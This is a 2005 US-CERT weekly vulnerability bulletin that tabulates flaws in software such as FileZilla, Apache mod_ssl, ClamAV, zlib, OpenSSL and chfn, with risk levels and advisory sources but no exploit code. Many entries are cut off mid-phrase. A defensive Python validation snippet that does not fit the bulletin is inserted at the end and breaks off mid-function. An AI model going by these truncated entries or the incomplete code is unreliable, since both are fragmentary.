Summary of Security Items from November 2 through November 8, 2005
The CISA Vulnerability Bulletin provides a summary of new vulnerabilities that have been recorded in the past week. In some cases, the vulnerabilities in the bulletin may not yet have assigned CVSS scores.
Vulnerabilities are based on the Common Vulnerabilities and Exposures (CVE) vulnerability naming standard and are organized according to severity, determined by the Common Vulnerability Scoring System (CVSS) standard. The division into high, medium, and low severities corresponds to the following scores:
- High: vulnerabilities with a CVSS base score of 7.0–10.0
- Medium: vulnerabilities with a CVSS base score of 4.0–6.9
- Low: vulnerabilities with a CVSS base score of 0.0–3.9
Entries may include additional information provided by organizations and efforts sponsored by CISA. This information may include identifying information, values, definitions, and related links. Patch information is provided when available. Please note that some of the information in the bulletin is compiled from external, open-source reports and is not a direct result of CISA analysis.
Information in the US-CERT Cyber Security Bulletin is a compilation and includes information published by outside sources; therefore, the information should not be considered the result of US-CERT analysis. Software vulnerabilities are categorized in the section reflecting the operating system on which the vulnerability was reported; however, this does not mean that the vulnerability only affects the operating system reported, since this information is obtained from open-source information.
This bulletin provides a summary of new or updated vulnerabilities, exploits, trends, viruses, and trojans. Updates to vulnerabilities that appeared in previous bulletins are listed in bold text. The text in the Risk column appears in red for vulnerabilities ranking High. The risk levels applied to vulnerabilities in the Cyber Security Bulletin are based on how the "system" may be impacted. The Recent Exploit/Technique table contains a "Workaround or Patch Available" column that indicates whether a workaround or patch has been published for the vulnerability which the script exploits.
Vulnerabilities
The table below summarizes vulnerabilities that have been identified, even if they are not being exploited. Complete details about patches or workarounds are available from the source of the information or from the URL provided in the section. CVE numbers are listed where applicable. Vulnerabilities that affect both Windows and Unix Operating Systems are included in the Multiple Operating Systems section.
Note: All the information included in the following tables has been discussed in newsgroups and on web sites.
The Risk levels defined below are based on how the system may be impacted:
Note: Even though a vulnerability may allow several malicious acts to be performed, only the highest level risk will be defined in the Risk column.
- High - A high-risk vulnerability is defined as one that will allow an intruder to immediately gain privileged access (e.g., sysadmin or root) to the system or allow an intruder to execute code or alter arbitrary system files. An example of a high-risk vulnerability is one that allows an unauthorized user to send a sequence of instructions to a machine and the machine responds with a command prompt with administrator privileges.
- Medium - A medium-risk vulnerability is defined as one that will allow an intruder immediate access to a system with less than privileged access. Such a vulnerability gives the intruder the opportunity to continue the attempt to gain privileged access. An example of a medium-risk vulnerability is a server configuration error that allows an intruder to capture the password file.
- Low - A low-risk vulnerability is defined as one that will provide information to an intruder that could lead to further compromise attempts or a Denial of Service (DoS) attack. It should be noted that while the DoS attack is deemed low from a threat potential, the frequency of this type of attack is very high. DoS attacks against mission-critical nodes are not included in this rating and any attack of this nature should instead be considered to be a "High" threat.
Windows Operating Systems Only
Vendor & Software Name | Vulnerability - Impact / Patches - Workarounds / Attack Scripts | Common Name / CVE Reference | Risk | Source |
ASP Knowledgebase | A vulnerability has been reported in ASPKnowledgebase that could let remote malicious users perform SQL injection. No workaround or patch available at time of publishing. There is no exploit code required. | ASP Knowledgebase SQL Injection Vulnerability | Medium | Security Focus, ID: 15364, November 9, 2005 |
FileZilla Server Terminal 0.4.9d | A buffer overflow vulnerability has been reported in FileZilla that could let remote malicious users obtain elevated privileges or execute arbitrary code. No workaround or patch available at time of publishing. Currently we are not aware of any exploits for this vulnerability. | FileZilla Server Terminal Privilege Elevation or Arbitrary Code Execution | High | Security Focus, ID: 15346, November 7, 2005 |
WhatsUp Small Business 2004 | An input validation vulnerability has been reported in WhatsUp Small Business that could let remote malicious users traverse directories and disclose information. No workaround or patch available at time of publishing. A Proof of Concept exploit has been published. | WhatsUp Small Business Directory Traversal and Information Disclosure | Medium | Security Tracker, Alert ID: 1015141, November 3, 2005 |
DirectX DirectShow 7.0 to 9.0c | A buffer overflow vulnerability has been reported in DirectX DirectShow that could let remote malicious users execute arbitrary code. Vendor fix available: Avaya: V1.3: updated to note the availability of Microsoft Knowledge Base Article 909596, to clarify an issue affecting Windows 2000 SP4 customers, and to update file versions. V1.4: updated to note complications of the DirectX 8.1 update on machines running DirectX 9. Currently we are not aware of any exploits for this vulnerability. | Microsoft DirectX DirectShow Arbitrary Code Execution | High | Microsoft, Security Bulletin MS05-050, October 11, 2005 Technical Cyber Security Alert TA05-284A, October 11, 2005 Avaya, ASA-2005-214, October 11, 2005 Microsoft, Security Bulletin MS05-050 V1.3, October 21, 2005 Microsoft, Security Bulletin MS05-050 V1.4, November 9, 2005 |
Microsoft Windows 2000 Advanced Server Microsoft Windows 2000 Datacenter Server Microsoft Windows 2000 Professional Microsoft Windows 2000 Server | A vulnerability has been reported that could let remote malicious users cause a Denial of Service. This is due to an error when processing EMF (Microsoft Enhanced Metafile) files in the Vendor solution available: Proof of Concept exploits have been published. | Microsoft Windows EMF File Denial of Service Vulnerability | Low | Secunia SA14631, March 18, 2005 Security Focus, ID: 12834, November 9, 2005 Microsoft, Security Bulletin MS05-053, November 8, 2005 |
Windows Graphics Rendering Engine | A buffer overflow vulnerability has been reported in Windows Graphics Rendering Engine that could let local or remote malicious users execute arbitrary code. Vendor solution available: Currently we are not aware of any exploits for this vulnerability. | Microsoft Windows Graphics Rendering Engine Arbitrary Code Execution CVE-2005-2123 | High | Security Tracker, Alert ID: 1015168, November 8, 2005 Microsoft, Security Bulletin MS05-053, November 8, 2005 |
Windows Kerberos PKINIT | Multiple vulnerabilities have been reported in Windows Kerberos PKINIT that could let remote malicious users disclose information or cause a Denial of Service. Vendor fix available: Currently we are not aware of any exploits for this vulnerability. | Microsoft Windows Kerberos PKINIT Information Disclosure or Denial of Service | Low | Microsoft Security Bulletin MS05-042, August 9, 2005 |
Calendar Manager Pro 1.0, 1.0.1 | A vulnerability has been reported in Calendar Manager Pro that could let remote malicious users bypass authentication. No workaround or patch available at time of publishing. There is no exploit code required; however, Proof of Concept exploits have been published. | Ocean12 Calendar Manager Pro Authentication Bypassing | Medium | Security Focus, ID: 15329, November 4, 2005 |
UNIX / Linux Operating Systems Only
Vendor & Software Name | Vulnerability - Impact / Patches - Workarounds / Attack Scripts | Common Name / CVE Reference | Risk | Source |
Apache 2.0.x | A vulnerability has been reported in 'modules/ssl/ssl_engine_ Patch available at: OpenPKG: RedHat: Ubuntu: SGI: Debian: Mandriva: Slackware: Trustix: Debian: Gentoo: Avaya: Conectiva: TurboLinux: Trustix: RedHat: There is no exploit code required. | Apache 'Mod_SSL SSLVerifyClient' Restriction Bypass | Medium | Security Tracker Alert ID: 1014833, September 1, 2005 OpenPKG Security Advisory, OpenPKG-SA-2005.017, September 3, 2005 RedHat Security Advisory, RHSA-2005:608-7, September 6, 2005 Ubuntu Security Notice, USN-177-1, September 07, 2005 SGI Security Advisory, 20050901-01-U, September 7, 2005 Debian Security Advisory, DSA 805-1, September 8, 2005 Mandriva Linux Security Update Advisory, MDKSA-2005:161, September 8, 2005 Slackware Security Advisory, SSA:2005-251-02, September 9, 2005 Trustix Secure Linux Security Advisory, TSLSA-2005-0047, September 9, 2005 Debian Security Advisory DSA 807-1, September 12, 2005 Gentoo Linux Security Advisory, GLSA 200509-12, September 19, 2005 Avaya Security Advisory, ASA-2005-204, September 23, 2005 Conectiva Linux Announcement, CLSA-2005:1013, September 27, 2005 Turbolinux Security Advisory, TLSA-2005-94, October 3, 2005 HP Security Bulletin, Trustix Secure Linux Security Advisory, TSLSA-2005-0059, October 21, 2005 RedHat Security Advisory, RHSA-2005:816-10, November 2, 2005 |
Asterisk@Home 2.0-beta4, 1.5, Asterisk 1.2.0-beta1, 1.0.9, 1.0.8, 1.0.7, 0.9.0, 0.7-0.7.2, 0.4, 0.3, 0.2, 0.1.7-0.1.9-1 | A vulnerability has been reported in 'vmail.cgi' due to insufficient sanitization of the 'folder' parameter, which could let a remote malicious user obtain unauthorized access. Upgrades available at: There is no exploit code required; however, a Proof of Concept exploit has been published. | Asterisk Voicemail Unauthorized Access | Medium | Assurance.com.au Vulnerability Advisory, November 7, 2005 |
linux-ftpd-ssl 0.17 | A buffer overflow vulnerability has been reported in the 'vsprintf()' function in the FTP server, which could let a remote malicious user execute arbitrary code. No workaround or patch available at time of publishing. An exploit script has been published. | Linux-FTPD-SSL FTP Server Remote Buffer Overflow | High | Secunia Advisory: SA17465, November 8, 2005 |
cPanel 10.6.0-R137, 10.2.0-R82 | A Cross-Site Scripting vulnerability has been reported in the Entropy Chat script due to insufficient sanitization, which could let a remote malicious user execute arbitrary HTML and script code. No workaround or patch available at time of publishing. There is no exploit code required; however, a Proof of Concept exploit has been published. | cPanel Cross-Site Scripting | Medium | Secunia Advisory: SA16609, November 4, 2005 |
horde 3.0.4 | A vulnerability has been reported because the default Horde3 installation for Debian has a blank administrator password, which could let a local/remote malicious user obtain administrative access. Upgrade available at: There is no exploit code required. | Debian Horde Default Administrator Password | High | Debian Security Advisory, DSA 884-1, November 7, 2005 |
eric3 prior to 3.7.2 | A vulnerability has been reported due to a "potential security exploit." The impact was not specified. Upgrades available at: Debian: SUSE: Currently we are not aware of any exploits for this vulnerability. | eric3 Unspecified Vulnerability | Not Specified | Security Tracker Alert ID: 1014947, September 21, 2005 Debian Security Advisory, DSA 869-1, October 21, 2005 SUSE Security Summary Report, SUSE-SR:2005:025, November 4, 2005 |
ELM 2.5.5-2.5.7 | A buffer overflow vulnerability has been reported due to insufficient parsing of SMTP 'Expires' header lines, which could let a remote malicious user execute arbitrary code. Update to Elm 2.5 PL8 available at: RedHat: Slackware: A Proof of Concept exploit script has been published. | Elm 'Expires' Header Remote Buffer Overflow | High | Security Tracker Alert ID: 1014745, August 20, 2005 RedHat Security Advisory, RHSA-2005:755-07, August 23, 2005 Slackware Security Advisory, SSA:2005-311-01, November 8, 2005 |
Fetchmail 6.x | A vulnerability has been reported in the 'fetchmailconf' configuration utility due to a race condition, which could let a malicious user obtain sensitive information. Upgrades available at: http://download. Gentoo: Ubuntu: There is no exploit code required. | Fetchmail 'fetchmailconf' Information Disclosure | Medium | fetchmail-SA-2005-02 Security Announcement, October 21, 2005 Gentoo Linux Security Advisory, GLSA 200511-06, November 6, 2005 Ubuntu Security Notice, USN-215-1, November 07, 2005 |
Internet Gatekeeper for Linux, | A vulnerability has been reported because certain CGI scripts that have world-executable permissions and set user id (setuid) permissions can be invoked by a malicious user to obtain root privileges. Fix available at: There is no exploit code required; however, a Proof of Concept exploit script has been published. | F-Secure Anti-Virus Gatekeeper & Gateway for Linux Elevated Privileges | High | F-Secure Security Bulletin FSC-2005-3, November 7, 2005 |
Gallery 1.5, 1.4-1.4.4-pl5 | A vulnerability has been reported in 'classes/postnuke0.7.1/ Upgrades available at: Debian: There is no exploit code required. | | Medium | Secunia Advisory: SA16389, August 11, 2005 Debian Security Advisory, DSA 879-1, November 2, 2005 |
Gentoo Linux | Vulnerabilities have been reported in multiple packages in Gentoo Linux due to an insecure RUNPATH, which could let a malicious user obtain elevated privileges. Gentoo: Gentoo: There is no exploit code required. | Gentoo Linux Multiple Packages Insecure RUNPATH | Medium | Gentoo Linux Security Advisory, GLSA 200510-14, October 17, 2005 Gentoo Linux Security Advisory, GLSA 200511-02, November 2, 2005 |
GpsDrive 2.09 | A format string vulnerability has been reported in 'Friendsd,' which could let a remote malicious user execute arbitrary code. Debian: Proof of Concept exploits have been published. | GpsDrive Remote Format String | High | Security Focus, Bugtraq ID: 15319, November 4, 2005 Debian Security Advisory, DSA 891-1, November 9, 2005 |
HP-UX 11.04, 11.0, 10.20, B.11.11, B.11.04, B.11.00 | A vulnerability was reported because remote malicious authenticated users can send specially crafted data to list directories with root privileges. Updates available at: There is no exploit code required; however, a Proof of Concept exploit script has been published. | HP-UX ftpd LIST Command Information Disclosure | Medium | HP Security Advisory, HPSBUX 02071, November 6, 2005 |
HP-UX B.11.00, B.11.11 | A vulnerability has been reported in 'envd' due to an unspecified error, which could let a remote malicious user execute arbitrary code and/or obtain elevated privileges. Patches available at: http://itrc.hp.com Currently we are not aware of any exploits for this vulnerability. | HP-UX 'envd' Arbitrary Code Execution or Elevated Privileges | High | HP Security Bulletin, HPSBUX 02073, November 9, 2005 |
HP-UX B.11.00, B.11.11, B.11.23 | A vulnerability has been reported in 'remshd' due to an unspecified error on systems running in Trusted Mode, which could let a remote malicious user obtain unauthorized access. Patches available at: http://itrc.hp.com Currently we are not aware of any exploits for this vulnerability. | HP-UX Trusted Mode 'remshd' Remote Unauthorized Access | Medium | HP Security Bulletin, HPSBUX 02072, November 9, 2005 |
AIX 5.2.2, 5.2L, 5.2 | A buffer overflow vulnerability has been reported in the 'SWCONS' command due to a boundary error. The impact was not specified. Update information available at: Currently we are not aware of any exploits for this vulnerability. | IBM AIX SWCONS Local Buffer Overflow | Not Specified | IBM Advisory, IY78467, November 3, 2005 |
CHM lib 0.35, 0.3-0.33, 0.2, 0.1 | A buffer overflow vulnerability has been reported in '_chm_ Upgrades available at: Debian: Currently we are not aware of any exploits for this vulnerability. | Jed Wing CHM Lib '_chm_find_ | High | iDefense Security Advisory, October 28, 2005 Debian Security Advisory, DSA 886-1, November 7, 2005 |
CHM lib 0.36, 0.35, 0.3-0.33, 0.2, 0.1 | A buffer overflow vulnerability has been reported in the '_chm_decompress_block()' function due to a boundary error when reading input, which could let a remote malicious user execute arbitrary code. Upgrades available at: SUSE: Debian: Currently we are not aware of any exploits for this vulnerability. | CHM Lib Remote Buffer Overflow | High | Security Focus, Bugtraq ID: 15211, October 26, 2005 SUSE Security Summary Report, SUSE-SR:2005:025, November 4, 2005 Debian Security Advisory, DSA 886-1, November 7, 2005 |
KOffice 1.4.1, 1.4, 1.3-1.3.5, 1.2.1, 1.2 | A buffer overflow vulnerability has been reported when handling a malformed RTF file, which could let a remote malicious user execute arbitrary code. Upgrades available at: Patches available at: Ubuntu: Gentoo: Ubuntu: Fedora: Mandriva: Debian: SUSE: Slackware: Conectiva: Currently we are not aware of any exploits for this vulnerability. | KDE KOffice KWord RTF Remote Buffer Overflow | High | Security Focus, Bugtraq ID: 15060, October 11, 2005 Ubuntu Security Notice, USN-202-1, October 12, 2005 Gentoo Linux Security Advisory, GLSA 200510-12, October 12, 2005 Fedora Update Notification, Mandriva Linux Security Update Advisory, MDKSA-2005:185, October 14, 2005 Debian Security Advisory, DSA 872-1, October 26, 2005 SUSE Security Summary Report, SUSE-SR:2005:025, November 4, 2005 Slackware Security Advisory, SSA:2005-310-02, November 7, 2005 Conectiva Security Announcement, CLSA-2005:1042, November 7, 2005 |
lm_sensors 2.9.1 | A vulnerability has been reported in the 'pwmconfig' script due to the insecure creation of temporary files, which could result in a loss of data or a Denial of Service. Ubuntu: Mandriva: Gentoo: Debian: Conectiva: Fedora: There is no exploit code required. | LM_sensors PWMConfig Insecure Temporary File Creation | Low | Security Focus, Bugtraq ID: 14624, August 22, 2005 Ubuntu Security Notice, USN-172-1, August 23, 2005 Mandriva Linux Security Update Advisory, MDKSA-2005:149, August 25, 2005 Gentoo Linux Security Advisory, GLSA 200508-19, August 30, 2005 Debian Security Advisory, DSA 814-1, September 15, 2005 Conectiva Linux Announcement, Fedora Update Notifications, |
ClamAV 0.80-0.87, 0.75.1, 0.70, 0.68, 0.65, 0.60, 0.51-0.54 | Several vulnerabilities have been reported: a buffer overflow vulnerability was reported in 'libclamav/fsg.c' due to a boundary error when unpacking FSG v1.33 compressed executable files, which could let a remote malicious user execute arbitrary code; a remote Denial of Service vulnerability was reported in 'libclamav/tnef.c' due to a validation error when handling a CAB file that contains a malformed header; a remote Denial of Service vulnerability was reported in 'libclamav/ Upgrades available at: Debian: Gentoo: Mandriva: Currently we are not aware of any exploits for these vulnerabilities. | Clam AntiVirus Remote Denial of Service & Arbitrary Code Execution | High | Security Tracker Alert ID: 1015154, November 4, 2005 Debian Security Advisory DSA 887-1, November 7, 2005 Gentoo Linux Security Advisory, GLSA 200511-04, November 7, 2005 Mandriva Linux Security Advisory, MDKSA-2005:205, November 7, 2005 |
ht://Dig Group ht://Dig 3.1.5-8, 3.1.5-7, 3.1.5, 3.1.6, 3.2.0, 3.2.0b2-0b6; SuSE Linux 8.0, i386, 8.1, 8.2, 9.0, 9.0 x86_64, 9.1, 9.2 | A Cross-Site Scripting vulnerability exists due to insufficient filtering of HTML code from the 'config' parameter, which could let a remote malicious user execute arbitrary HTML and script code. SuSE: Debian: Gentoo: Mandrake: http://www.mandrakesecure.net/en/ftp.php Fedora: SCO: A Proof of Concept exploit has been published. | ht://Dig | High | SUSE Security Summary Report, SUSE-SR:2005:003, February 4, 2005 Debian Security Advisory, DSA 680-1, February 14, 2005 Gentoo Linux Security Advisory, GLSA 200502-16, Mandrakelinux Security Update Advisory, Fedora Update Notification, SCO Security Advisory, SCOSA-2005.46, November 2, 2005 |
Jed Wing CHM lib 0.35-0.37, 0.3-0.33, 0.2, 0.1; | A buffer overflow vulnerability has been reported in the LZX decompression method, which could possibly let a remote malicious user execute arbitrary code. Upgrade available at: Debian: Currently we are not aware of any exploits for this vulnerability. | Jed Wing CHM Lib LZX Decompression Method Buffer Overflow | High | Debian Security Advisory DSA 886-1, November 7, 2005 |
OpenBSD 3.0-3.7, 2.0-2.9; Keith Muller pax | A vulnerability has been reported when an archive is extracted into a world or group writeable directory, which could let a malicious user modify file permissions. OpenBSD: There is no exploit code required. | Pax File Permission Modification Race Condition | Medium | Security Focus, Bugtraq ID: 15262, November 1, 2005 |
Squid Web Proxy Cache 2.5.STABLE3-STABLE10, STABLE1 | A remote Denial of Service vulnerability has been reported when handling certain client NTLM authentication request sequences. Upgrades available at: Ubuntu: Debian: Mandriva: SCO: SUSE: Currently we are not aware of any exploits for this vulnerability. | Squid NTLM Authentication Remote Denial of Service | Low | Secunia Advisory: SA16992, September 30, 2005 Ubuntu Security Notice, USN-192-1, September 30, 2005 Debian Security Advisory, DSA 828-1, September 30, 2005 Mandriva Linux Security Update Advisory, MDKSA-2005:181, October 11, 2005 SCO Security Advisory, SCOSA-2005.44, November 1, 2005 SUSE Security Summary Report, SUSE-SR:2005:025, November 4, 2005 |
zlib 1.2.2, 1.2.1, 1.2.0.7, 1.1-1.1.4, 1.0-1.0.9; Ubuntu Linux 5.04, powerpc, i386, amd64, 4.1 ppc, ia64, ia32; SuSE Open-Enterprise-Server 9.0, Novell Linux Desktop 9.0, Linux Professional 9.3, x86_64, 9.2, x86_64, 9.1, x86_64, Linux Personal 9.3, x86_64, 9.2, x86_64, 9.1, x86_64, Linux Enterprise Server 9; Gentoo Linux; | A buffer overflow vulnerability has been reported due to insufficient validation of input data prior to utilizing it in a memory copy operation, which could let a remote malicious user execute arbitrary code. Debian: FreeBSD: Gentoo: SUSE: Ubuntu: Mandriva: OpenBSD: OpenPKG: RedHat: Trustix: Slackware: TurboLinux: Fedora: zsync: Apple: SCO: IPCop: Debian: Trolltech: FedoraLegacy: Gentoo: Gentoo: Debian: Trustix: Sun: Mandriva: Ubuntu: Ubuntu: Currently we are not aware of any exploits for this vulnerability. | Zlib Compression Library Buffer Overflow | High | Debian Security Advisory FreeBSD Security Advisory, Gentoo Linux Security Advisory, GLSA 200507- SUSE Security Announcement, SUSE-SA:2005:039, Ubuntu Security Notice, RedHat Security Advisory, RHSA-2005:569-03, Fedora Update Notifications, Mandriva Linux Security Update Advisory, OpenPKG Trustix Secure Slackware Security Turbolinux Security Fedora Update Notification, FEDORA-2005-565, July 13, 2005 SUSE Security Summary Security Focus, 14162, July 21, 2005 USCERT Vulnerability Note VU#680620, July 22, 2005 Apple Security Update 2005-007, SCO Security Advisory, SCOSA-2005.33, August 19, 2005 Security Focus, Bugtraq ID: 14162, August 26, 2005 Debian Security Advisory, DSA 797-1, September 1, 2005 Security Focus, Bugtraq ID: 14162, September 12, 2005 Fedora Legacy Update Advisory, FLSA:162680, September 14, 2005 Gentoo Linux Security Advisory, GLSA 200509-18, September 26, 2005 Debian Security Advisory, DSA 797-2, September 29, 2005 Trustix Secure Linux Security Advisory, TSLSA-2005-0055, October 7, 2005 Sun(sm) Alert Notification Mandriva Linux Security Advisory MDKSA-2005:196, October 26, 2005 Ubuntu Security Notice, USN-151-3, October 28, 2005 Ubuntu Security Notice, USN-151-4, November 09, 2005 |
zlib 1.2.2, 1.2.1; Ubuntu Linux 5.04 powerpc, i386, amd64, | A remote Denial of Service vulnerability has been reported due to a failure of the library to properly handle unexpected compression routine input. Zlib: Debian: Ubuntu: OpenBSD: Mandriva: Fedora: Slackware: FreeBSD: SUSE: Gentoo: http://security.gentoo. Trustix: Conectiva: Apple: TurboLinux: SCO: Debian: Trolltech: FedoraLegacy: Debian: Mandriva: Ubuntu: Ubuntu: Currently we are not aware of any exploits for this vulnerability. | Multiple Vendor Zlib Compression Library Decompression Remote Denial of Service | Low | Security Focus, Bugtraq ID 14340, July 21, 2005 Debian Security Advisory DSA 763-1, July 21, 2005 Ubuntu Security Notice, USN-151-1, July 21, 2005 OpenBSD, Release Errata 3.7, July 21, 2005 Mandriva Security Advisory, MDKSA-2005:124, July 22, 2005 Secunia, Advisory: SA16195, July 25, 2005 Slackware Security Advisory, SSA:2005- FreeBSD Security Advisory, SA-05:18, July 27, 2005 SUSE Security Announcement, Gentoo Linux Security Advisory, GLSA 200507-28, July 30, 2005 Gentoo Linux Security Advisory, GLSA 200508-01, August 1, 2005 Trustix Secure Linux Security Advisory, TSLSA-2005-0040, August 5, 2005 Conectiva Linux Announcement, CLSA-2005:997, August 11, 2005 Apple Security Update, APPLE-SA-2005-08-15, August 15, 2005 Turbolinux Security Advisory, TLSA-2005-83, August 18, 2005 SCO Security Advisory, SCOSA-2005.33, August 19, 2005 Debian Security Advisory, DSA 797-1, September 1, 2005 Security Focus, Bugtraq ID: 14340, September 12, 2005 Fedora Legacy Update Advisory, FLSA:162680, September 14, 2005 Debian Security Advisory, DSA 797-2, September 29, 2005 Mandriva Linux Security Advisory, MDKSA-2005:196, October 26, 2005 Ubuntu Security Notice, USN-151-3, October 28, 2005 Ubuntu Security Notice, USN-151-4, November 09, 2005 |
Debian Linux 3.1, sparc, s/390, ppc, mipsel, mips, m68k, ia-64, ia-32, hppa, arm, amd64, alpha, 3.0, sparc, s/390, ppc, mipsel, mips, m68k, ia-64, ia-32, hppa, arm, alpha; | A vulnerability has been reported due to the insecure creation of temporary files, which could let a malicious user overwrite arbitrary files. Debian: There is no exploit code required. | Acme Thttpd Insecure Temporary File Creation | Medium | Debian Security Advisory DSA 883-1, November 4, 2005 |
Gnome-DB libgda 1.2.1; | Format string vulnerabilities have been reported in 'gda-log.c' due to format string errors in the 'gda_log_error()' and 'gda_ Debian: Ubuntu: Mandriva: Gentoo: SUSE: Fedora: Currently we are not aware of any exploits for these vulnerabilities. | GNOME-DB | High | Security Focus, Bugtraq ID: 15200, October 25, 2005 Debian Security Advisory, Ubuntu Security Notice, USN-212-1, October 28, 2005 Mandriva Linux Security Advisory, MDKSA-2005:203, November 1, 2005 Gentoo Linux Security Advisory, GLSA 200511-01, November 2, 2005 SUSE Security Summary Report, SUSE-SR:2005:025, November 4, 2005 Fedora Update Notification, |
GNU gnump3d 2.9-2.9.5; | A vulnerability has been reported in GNUMP3d that could let remote malicious users conduct Cross-Site Scripting or traverse directories. Upgrade to version 2.9.6: http://savannah.gnu.org/download/gnump3d/gnump3d-2.9.6.tar.gz Debian: SUSE: Gentoo: There is no exploit code required; however, Proof of Concept exploits have been published. | GNUMP3d Cross-Site Scripting or Directory Traversal | Medium | Security Focus Bugtraq IDs: 15226 & 15228, October 28, 2005 Debian Security Advisory DSA 877-1, October 28, 2005 SUSE Security Summary Report, SUSE-SR:2005:025, November 4, 2005 Gentoo Linux Security Advisory, GLSA 200511-05, November 6, 2005 |
GNU gnump3d 2.9-2.9.5; | A Cross-Site Scripting vulnerability has been reported due to insufficient sanitization of user-supplied input, which could let a remote malicious user execute arbitrary HTML and script code. Upgrades available at: Gentoo: There is no exploit code required. | GNU gnump3d Unspecified Cross-Site Scripting | Medium | Gentoo Linux Security Advisory GLSA 200511-05, November 7, 2005 |
Linux kernel 2.6-2.6.14 | A Denial of Service vulnerability has been reported in 'sysctl.c' due to an error when handling the un-registration of interfaces in '/proc/sys/net/ipv4/conf/.' Upgrades available at: There is no exploit code required. | Linux Kernel 'Sysctl' Denial of Service | Low | Secunia Advisory: SA17504, November 9, 2005 |
MandrakeSoft Multi Network Firewall 2.0, Linux Mandrake 2006.0 x86_64, 2006.0, 10.2 x86_64, 10.2, Corporate Server 3.0 x86_64, 3.0; | A buffer overflow vulnerability has been reported due to insufficient validation of user-supplied NTLM user name data, which could let a remote malicious user execute arbitrary code. WGet: Daniel Stenberg: Mandriva: Ubuntu: Fedora: Trustix: Gentoo: RedHat: http://rhn.redhat. SUSE: Slackware: Currently we are not aware of any exploits for this vulnerability. | Multiple Vendor WGet/Curl NTLM Username Buffer Overflow | High | Security Tracker Alert ID: 1015056, October 13, 2005 Mandriva Linux Security Update Advisories, MDKSA-2005:182 & 183, October 13, 200 Ubuntu Security Notice, USN-205-1, October 14, 2005 Fedora Update Notifications Fedora Update Notification, Trustix Secure Linux Security Advisory, TSLSA-2005-0059, October 21, 2005 Gentoo Linux Security Advisory, GLSA 200510-19, October 22, 2005 RedHat Security Advisories, RHSA-2005:807-6 & RHSA-2005:812-5, November 2, 2005 SUSE Security Summary Report, SUSE-SR:2005:025, November 4, 2005 Slackware Security Advisory, SSA:2005-310-01, November 7, 2005 |
RedHat Enterprise Linux WS 4, WS 3, 2.1, IA64, ES 4, ES 3, 2.1, IA64, AS 4, AS 3, AS 2.1, IA64, Desktop 4.0, 3.0, Advanced Workstation for the Itanium Processor 2.1, IA64; OpenSSL Project OpenSSL 0.9.3-0.9.8, 0.9.2b, 0.9.1c; FreeBSD 6.0 -STABLE, -RELEASE, 5.4 -RELENG, -RELEASE, 5.3 -STABLE, -RELENG, -RELEASE, 5.3, 5.2.1 -RELEASE, -RELENG, 5.2 -RELEASE, 5.2, 5.1 -RELENG, -RELEASE/Alpha, 5.1 -RELEASE-p5, -RELEASE, 5.1, 5.0 -RELENG, 5.0, 4.11 -STABLE, -RELENG, 4.10 -RELENG, -RELEASE, 4.10 | A vulnerability has been reported due to the implementation of the 'SSL_OP_MSIE_SSLV2_RSA_PADDING' option that maintains compatibility with third party software, which could let a remote malicious user bypass security. OpenSSL: FreeBSD: RedHat: Mandriva: Gentoo: Slackware: Fedora: Sun: Ubuntu: OpenPKG: SUSE: Trustix: SGI: Debian: NetBSD: BlueCoat Systems: Debian: Currently we are not aware of any exploits for this vulnerability. | Multiple Vendors OpenSSL Insecure Protocol Negotiation | Medium | OpenSSL Security Advisory, October 11, 2005 FreeBSD Security Advisory, FreeBSD-SA-05:21, October 11, 2005 RedHat Security Advisory, RHSA-2005:800-8, October 11, 2005 Mandriva Security Advisory, MDKSA-2005:179, October 11, 2005 Gentoo Linux Security Advisory, GLSA 200510-11, October 12, 2005 Slackware Security Advisory, SSA:2005-286-01, October 13, 2005 Fedora Update Notifications, Sun(sm) Alert Notification Ubuntu Security Notice, USN-204-1, October 14, 2005 OpenPKG Security Advisory, OpenPKG-SA-2005.022, October 17, 2005 SUSE Security Announcement, SUSE-SA:2005:061, October 19, 2005 Trustix Secure Linux Security Advisory, TSLSA-2005-0059, October 21, 2005 SGI Security Advisory, 20051003-01-U, October 26, 2005 Debian Security Advisory DSA 875-1, October 27, 2005 NetBSD Security Update, November 1, 2005 BlueCoat Systems Advisory, November 3, 2005 Debian Security Advisory, DSA 888-1, November 7, 2005 |
RedHat Enterprise Linux WS 4, WS 3, WS 2.1, IA64, ES 4, ES 3, ES 2.1, IA64, AS 4, AS 3, 2.1, IA64, Desktop 4.0, 3.0, Advanced Workstation for the Itanium Processor 2.1, IA64; | Several vulnerabilities have been reported: a remote Denial of Service vulnerability was reported due to a NULL pointer dereferencing error; and a vulnerability was reported due to a boundary error that causes an out-of-bounds memory access, which could let a remote malicious user cause a Denial of Service and potentially execute arbitrary code. Upgrades available at: Fedora: Gentoo: RedHat: SUSE: Ubuntu: Debian: Currently we are not aware of any exploits for these vulnerabilities. | Multiple Vendors libungif GIF File Handling | High | Security Tracker Alert ID: 1015149, November 3, 2005 Fedora Update Notifications, Gentoo Linux Security Advisory GLSA 200511-03, November 4, 2005 RedHat Security Advisory, RHSA-2005: SUSE Security Summary Report, Ubuntu Security Notice, USN-214-1, November 07, 2005 Debian Security Advisory, DSA 890-1, November 9, 2005 |
RedHat Fedora Core3; Ubuntu Linux 4.1 ppc, ia64, ia32; | A vulnerability has been reported in xntpd when started using the '-u' option and the group is specified by a string, which could let a malicious user obtain elevated privileges. Upgrade available at: Ubuntu: Debian: Mandriva: Conectiva: NetBSD: There is no exploit code required. | XNTPD Insecure Privileges | Medium | Fedora Update Notification, Ubuntu Security Notice, USN-175-1, September 01, 2005 Debian Security Advisory, DSA 801-1, September 5, 2005 Mandriva Linux Security Update Advisory, MDKSA-2005:156, September 6, 2005 Conectiva Linux Announcement, CLSA-2005:1029, October 11, 2005 NetBSD Security Advisory 2005-011, November 2, 2005 |
shadow shadow 4.0.3; | A vulnerability has been reported in the setuid 'chfn' program due to insufficient argument checking when changing the GECOS field, which could let a malicious user obtain root access. SUSE: An exploit script has been published. | Multiple Vendors CHFN User Modification ROOT Access | High | SUSE Security Announcement, SUSE-SA:2005:064, November 4, 2005 |
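The GECOS field sits between colons in a passwd record, so the argument check the entry above refers to must reject anything that acts as a field or record separator. The block below is an added example, not shadow's chfn source: it shows what an unchecked value does to a passwd record and the validation that refuses it. The sub-field layout (full name, room, work phone, home phone joined by commas) follows the common convention; GECOS_MAX_LEN and the function names are this example's own assumptions.

```python
"""Argument checking for a chfn-style GECOS update.

Added example, not shadow's chfn code. GECOS_MAX_LEN is an assumed limit."""
from typing import Optional

GECOS_MAX_LEN = 80


def gecos_problem(value: str) -> Optional[str]:
    """Return why VALUE may not be written into the GECOS column, or None."""
    if ":" in value:
        return "colon would terminate the passwd field"
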